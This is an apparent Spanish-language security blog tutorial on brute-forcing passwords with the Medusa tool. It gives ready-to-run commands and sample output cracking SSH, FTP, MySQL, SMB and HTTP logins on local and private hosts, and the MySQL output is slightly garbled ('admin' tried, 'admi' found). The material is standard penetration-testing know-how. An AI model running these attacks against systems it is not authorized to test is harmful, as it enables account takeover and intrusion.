Fuerza Bruta con Medusa: SSH, FTP, SMB, HTTP y MySQL

Qué es Medusa? 

El man lo describe como: "Auditor de Login de Red Paralelo", es una aplicación para realizar Fuerza Bruta de Passwords. 

Se denomina paralelo debido a que está basado en Hilos para testeo concurrente de varios hosts, usuarios ó passwords. 

Posee un diseño modular, cada servicio existe como un módulo independiente en archivos .mod. 

Instalamos medusa: 
# apt-get install medusa
Vemos que módulos soporta: 
# medusa -d

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

Available modules in "." : 

Available modules in "/usr/lib/medusa/modules" : 
+ cvs.mod : Brute force module for CVS sessions : version 2.0 
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.0 
+ http.mod : Brute force module for HTTP : version 2.0 
+ imap.mod : Brute force module for IMAP sessions : version 2.0 
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0 
+ mysql.mod : Brute force module for MySQL sessions : version 2.0 
+ ncp.mod : Brute force module for NCP sessions : version 2.0 
+ nntp.mod : Brute force module for NNTP sessions : version 2.0 
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0 
+ pop3.mod : Brute force module for POP3 sessions : version 2.0 
+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0 
+ rexec.mod : Brute force module for REXEC sessions : version 2.0 
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0 
+ rsh.mod : Brute force module for RSH sessions : version 2.0 
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0 
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0 
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0 
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.0 
+ ssh.mod : Brute force module for SSH v2 sessions : version 2.0 
+ svn.mod : Brute force module for Subversion sessions : version 2.0 
+ telnet.mod : Brute force module for telnet sessions : version 2.0 
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0 
+ vnc.mod : Brute force module for VNC sessions : version 2.0 
+ web-form.mod : Brute force module for web forms : version 2.0 
+ wrapper.mod : Generic Wrapper Module : version 2.0 


Fuerza Bruta a SSH: 
# medusa -h localhost -u root -P /root/pass.txt -M ssh -n 2222


-h Indicamos la Ip del host al cual queremos hacer fuerza bruta (127.0.0.1) 
-u El usuario del server (root) 
-P Especificamos la ruta al archivo de lista de posibles passwords 
-M Es el módulo que deseamos (SSH, FTP, etc) 
-n Cambiamos el puerto que por defecto es el 22 (a 2222) 


Vemos los intentos y cuando logra encontrar el password: 

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

The default build of Libssh2 is to use OpenSSL for crypto. Several Linux 
distributions (e.g. Debian, Ubuntu) build it to use Libgcrypt. Unfortunately, 
the implementation within Libssh2 of libgcrypt appears to be broken and is 
not thread safe. If you run multiple concurrent Medusa SSH connections, you 
are likely to experience segmentation faults. Please help Libssh2 fix this 
issue or encourage your distro to use the default Libssh2 build options. 

ACCOUNT CHECK: [ssh] Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 1234 (1 of 8 complete) 
ACCOUNT CHECK: [ssh] Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: peterete (2 of 8 complete) 
ACCOUNT CHECK: [ssh] Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: mi_pass (3 of 8 complete) 
ACCOUNT CHECK: [ssh] Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: otro.mas (4 of 8 complete) 
ACCOUNT CHECK: [ssh] Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: pass (5 of 8 complete) 
ACCOUNT CHECK: [ssh] Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: mi_passwd (6 of 8 complete) 
ACCOUNT FOUND: [ssh] Host: localhost User: root Password: mi_passwd  


Ahora veremos medusa para Fuerza Bruta de FTP: 
# medusa -C pass.txt -M ftp


Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ERROR: Thread B6BD6B70: Host: 192.168.1.101 Cannot connect [unreachable], retrying (1 of 3 retries) 
ERROR: Thread B6BD6B70: Host: 192.168.1.101 Cannot connect [unreachable], retrying (2 of 3 retries) 
ERROR: Thread B6BD6B70: Host: 192.168.1.101 Cannot connect [unreachable], retrying (3 of 3 retries) 
NOTICE: ftp.mod: failed to connect, port 21 was not open on 192.168.1.101 
ACCOUNT CHECK:  Host: 192.168.1.150 (2 of 3, 1 complete) User: ftp_user (1 of 2, 0 complete) Password: ftp_pass (1 of 4 complete) 
ACCOUNT FOUND:  Host: 192.168.1.150 User: ftp_user Password: ftp_pass  
ACCOUNT CHECK:  Host: 192.168.1.150 (2 of 3, 1 complete) User: user1 (2 of 2, 1 complete) Password: peterete (1 of 1 complete) 
ERROR: Thread B5AD0B70: Host: 192.168.1.200 Cannot connect [unreachable], retrying (1 of 3 retries) 
ERROR: Thread B5AD0B70: Host: 192.168.1.200 Cannot connect [unreachable], retrying (2 of 3 retries) 
ERROR: Thread B5AD0B70: Host: 192.168.1.200 Cannot connect [unreachable], retrying (3 of 3 retries) 


Fuerza bruta del user root del mysql en el localhost: 
# medusa -h localhost -u root -P pass.txt -M mysql


Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CHECK:   Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 1234 (1 of 9 complete) 
ACCOUNT CHECK:   Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: telev (2 of 9 complete) 
ACCOUNT CHECK:   Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: peterete (3 of 9 complete) 
ACCOUNT CHECK:   Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: mi_pass (4 of 9 complete)
ACCOUNT CHECK:   Host: localhost (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: admin (5 of 9 complete) 
ACCOUNT FOUND:   Host: localhost User: root Password: admi  


Fuerza bruta a SMB: 
# medusa -h 192.168.1.100 -u admin -P /root/pass.txt -M smbnt



ACCOUNT CHECK: [smbnt] Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: pepe (1 of 6 complete) 
ACCOUNT CHECK: [smbnt] Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: admin (2 of 6 complete) 
ACCOUNT CHECK: [smbnt] Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 1234 (3 of 6 complete) 
ACCOUNT CHECK: [smbnt] Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: miPass (4 of 6 complete) 
ACCOUNT FOUND: [smbnt] Host: 192.168.1.100 User: admin Password: miPass  


Fuerza bruta http: 
#root@prueba:~# medusa -h 192.168.1.100 -u admin -P /root/wordlist.txt -M http



ACCOUNT CHECK:  Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: qwerty (1 of 6 complete) 
ACCOUNT CHECK:  Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 1234 (2 of 6 complete) 
ACCOUNT CHECK:  Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: pepe (3 of 6 complete) 
ACCOUNT CHECK:   Host: 192.168.1.100 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: miPass (4 of 6 complete) 
ACCOUNT FOUND:  Host: 192.168.1.100 User: admin Password: miPass  


Más info en: http://www.redes-seguridad.com.ar
Para que ste blog siga creciendo:


Visitenos en:

Instagram